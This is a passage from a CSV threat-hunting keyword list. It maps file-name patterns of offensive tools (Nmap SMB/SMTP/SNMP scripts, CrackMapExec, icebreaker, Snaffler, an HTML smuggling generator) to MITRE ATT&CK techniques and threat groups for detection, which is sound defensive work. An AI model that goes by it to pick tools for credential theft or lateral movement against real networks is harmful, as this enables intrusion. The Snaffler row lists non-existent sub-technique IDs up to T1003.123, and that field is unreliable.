- T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smb2-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb2-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb2-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb2-vuln-uptime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-cmds.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"* smb-double-pulsar-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-domains.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-groups.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-services.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-sessions.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smb-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-mbenum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-os-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-print-text.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-protocols.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-psexec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-server-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smbsr.db*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" +"* smbsr.log*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" +"* smb-system-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-cve2009-3103.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-cve-2017-7494.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms06-025.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms07-029.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms08-067.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms10-054.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms10-061.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms17-010.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-regsvc-dos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-webexec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-webexec-exploit.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-commands.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* smtp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-open-relay.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-strangeport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-vuln-cve2010-4344.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-vuln-cve2011-1720.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-vuln-cve2011-1764.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-vuln-cve2020-28017-through-28026-21nails.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" +"* smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"* snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","0","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"* sniffer-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-hh3c-logins.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-ios-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-netstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-sysdescr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-win32-services.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-win32-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-win32-software.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - 